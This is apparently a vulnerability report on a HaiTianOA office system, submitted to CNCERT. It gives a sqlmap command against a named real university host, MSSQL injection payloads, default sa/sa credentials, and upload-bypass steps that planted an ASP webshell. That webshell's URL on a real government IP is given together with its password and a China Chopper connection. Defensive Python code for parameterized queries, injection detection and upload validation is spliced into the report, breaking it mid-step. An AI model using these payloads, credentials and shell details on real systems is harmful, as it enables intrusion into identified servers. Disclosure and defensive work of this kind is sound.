SQL injection + backend getshell in an OA system
SQL injection in an OA system + getshell in the admin backend. First time submitting a general-purpose vulnerability, so a bit tense.
[SQL injection]
The OA system's login page has a SQL injection. Several tested instances showed that the backend database is MSSQL, and on most of them the injection can be used to run OS commands through os-shell.
Injection point:
http://VICTIM.COM/loginverify.asp
POST Data:
Digest=&urlFrom=&username=admin&password=admin&Memo=1
The username parameter is injectable.
Example:
sqlmap.py -u "http://oa.tjfsu.edu.cn/loginverify.asp" --data "Digest=&urlFrom=&username=admin&password=admin&Memo=1" -p username
sqlmap identified the following injection points with a total of 90 HTTP(s) requests:
---
Place: POST
Parameter: username
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: Digest=&urlFrom=&username=admin' AND 2836=CONVERT(INT,(SELECT CHAR(113)+CHAR(111)+CHAR(120)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (2836=2836) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(103)+CHAR(108)+CHAR(100)+CHAR(113))) AND 'HQUn'='HQUn&password=admin&Memo=1

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: Digest=&urlFrom=&username=admin'; WAITFOR DELAY '0:0:5'--&password=admin&Memo=1

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: Digest=&urlFrom=&username=admin' WAITFOR DELAY '0:0:5'--&password=admin&Memo=1
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
Running sqlmap with --dbs reveals a database named "HaiTianOA". Its "VO_UserInfor" table stores the accounts and passwords of the administrators who can log on to the OA backend (most instances have sa/sa; some passwords are stored in plain text, others are merely Base64-encoded).
CNCERT, please verify further instances yourselves.
[Getshell in the backend]
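As an added defensive illustration (not code from this report or from the HaiTianOA product, whose loginverify.asp source is not shown), the following Python sketch puts three things side by side: the string-concatenated login query that the sqlmap result above implies, the parameterized and hashed form that removes the injection, and a small check that flags the MSSQL-specific markers from those payloads in a POST body. SQLite stands in for MSSQL, and the table layout, the account and its password are constructed for the example.

```python
import hashlib
import hmac
import os
import re
import sqlite3
from urllib.parse import unquote_plus

# 1. The vulnerable pattern. loginverify.asp's source is not on the page; this
#    reproduces the string concatenation the sqlmap result implies (assumed).
#    A quote in the username closes the literal and the rest becomes SQL.
def build_unsafe_login_sql(username, password):
    return ("SELECT * FROM VO_UserInfor WHERE username='" + username
            + "' AND password='" + password + "'")


# 2. The fixed pattern: bound parameters plus salted password hashing.
#    SQLite stands in for MSSQL (placeholder syntax differs, the principle is
#    the same: user input travels as a value, never as SQL text). The table
#    layout, the account and its password are constructed for this example.
def _hash_pw(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, 100_000)


def make_user_store():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE VO_UserInfor "
                 "(username TEXT PRIMARY KEY, salt BLOB, pw_hash BLOB)")
    salt = os.urandom(16)
    conn.execute("INSERT INTO VO_UserInfor VALUES (?, ?, ?)",
                 ("admin", salt, _hash_pw("correct horse battery staple", salt)))
    conn.commit()
    return conn


def login_parameterized(conn, username, password):
    """True only for a real account with the right password; injected
    syntax in either field is just a string that matches no row."""
    row = conn.execute("SELECT salt, pw_hash FROM VO_UserInfor WHERE username = ?",
                       (username,)).fetchone()
    if row is None:
        return False
    salt, stored = row
    return hmac.compare_digest(stored, _hash_pw(password, salt))


# 3. Detection: the markers the three sqlmap techniques above leave in the
#    request body. These are indicators for review, not a blocklist (a real
#    password may contain "--"); they need a WAF or request log with POST bodies.
MSSQL_INJECTION_MARKERS = (
    (r"waitfor\s+delay", "time-based blind (WAITFOR DELAY)"),
    (r"convert\s*\(\s*int", "error-based (CONVERT(INT, ...))"),
    (r"'\s*;", "stacked query (quote followed by ';')"),
    (r"--", "SQL comment terminator"),
)


def injection_indicators(post_body, fields=("username", "password")):
    hits = []
    for pair in post_body.split("&"):  # split by hand; parse_qs separators vary by version
        name, _, raw = pair.partition("=")
        if name not in fields:
            continue
        value = unquote_plus(raw)
        for pattern, label in MSSQL_INJECTION_MARKERS:
            if re.search(pattern, value, re.IGNORECASE):
                hits.append(f"{name}: {label}")
    return hits


# The stacked-query payload from the sqlmap output above, as it appears in the body.
PAYLOAD_BODY = "Digest=&urlFrom=&username=admin'; WAITFOR DELAY '0:0:5'--&password=admin&Memo=1"

if __name__ == "__main__":
    print(build_unsafe_login_sql("admin'; WAITFOR DELAY '0:0:5'--", "admin"))
    conn = make_user_store()
    print(login_parameterized(conn, "admin'; WAITFOR DELAY '0:0:5'--", "admin"))
    print(injection_indicators(PAYLOAD_BODY))
```

The concatenated string shows why stacked queries work here: the quote in the username ends the literal, the semicolon starts a second statement, and `--` discards the rest of the original WHERE clause. With a bound parameter the same input is compared as one opaque value and simply finds no user. The hashing removes the second finding as well: a dump of VO_UserInfor no longer yields plaintext or Base64-decodable passwords.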
Use sa/sa to log on to the Shanghai City Appearance and Environmental Sanitation Vehicle Transport Department instance (http://180.166.7.94/).
After logging on, go to "Information Content Maintenance" -> "Modify".
Click the Add Image button in the editor, which opens http://VICTIM.COM/ckeditor/tupianadd.asp
Rename the trojan file to a .jpg suffix, intercept the upload request, and remove the .jpg from the filename.
Although HTTP 500 is returned, the upload succeeds.
Combining the paths gives the trojan URL: http://180.166.7.94/file/images/20147408067349.asp, password helo
Kitchen Knife (China Chopper) connection:
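An added example (not code from this report or from the OA product) of how the image upload handler should decide what it writes to disk: the extension is taken from an allow-list check on the client filename, the content must carry the matching image signature, and the stored name is generated server-side, all before anything is written (the HTTP 500 above arrived after the file already existed, which is exactly the ordering this avoids). The allowed types, signature bytes and sample inputs are constructed for the example.

```python
import os
import re
import secrets
import tempfile

# Allow-listed image extensions and the signature bytes each one must start
# with (constructed for this example; extend as the application needs).
ALLOWED_IMAGE_TYPES = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}


class UploadRejected(ValueError):
    pass


def validate_image_upload(client_filename, content):
    """Return the allow-listed extension, or raise UploadRejected.
    Nothing in the client-supplied name is trusted beyond this check."""
    base = os.path.basename(client_filename.replace("\\", "/"))
    # name.ext only: no path, no second dot, nothing after the extension.
    m = re.fullmatch(r"[A-Za-z0-9_-]+\.([A-Za-z0-9]+)", base)
    if not m:
        raise UploadRejected("filename must be name.ext with no extra dots")
    ext = m.group(1).lower()
    if ext not in ALLOWED_IMAGE_TYPES:
        raise UploadRejected(f".{ext} is not an allowed image type")
    if not any(content.startswith(sig) for sig in ALLOWED_IMAGE_TYPES[ext]):
        raise UploadRejected("content does not match the declared image type")
    return ext


def server_side_name(ext):
    # The client never picks the stored name: random stem, fixed extension.
    return f"{secrets.token_hex(16)}.{ext}"


def store_upload(client_filename, content, upload_dir):
    """Validate first, write second; returns the stored filename."""
    ext = validate_image_upload(client_filename, content)
    name = server_side_name(ext)
    with open(os.path.join(upload_dir, name), "xb") as fh:  # never overwrite
        fh.write(content)
    return name


# Constructed sample uploads: a minimal JPEG header and an ASP-looking text.
SAMPLE_JPEG = b"\xff\xd8\xff\xe0" + b"\x00" * 12
SAMPLE_SCRIPT = b"<% Response.Write(\"x\") %>"


def demo():
    """Run the handler over the constructed samples; return (stored, rejected)."""
    upload_dir = tempfile.mkdtemp()
    stored, rejected = [], []
    for fname, data in (("photo.jpg", SAMPLE_JPEG),
                        ("shell.asp", SAMPLE_SCRIPT),      # .jpg removed in the request
                        ("shell.asp.jpg", SAMPLE_JPEG),    # double extension
                        ("photo.jpg", SAMPLE_SCRIPT)):     # extension does not match content
        try:
            stored.append(store_upload(fname, data, upload_dir))
        except UploadRejected as exc:
            rejected.append(f"{fname}: {exc}")
    return stored, rejected


if __name__ == "__main__":
    print(demo())
```

The case in the report, a script file whose `.jpg` suffix is stripped from the intercepted request, fails the allow-list test; a script that keeps the `.jpg` name fails the signature test instead. Because the stored name is never derived from the request, the attacker also cannot predict or choose the path under /file/images/.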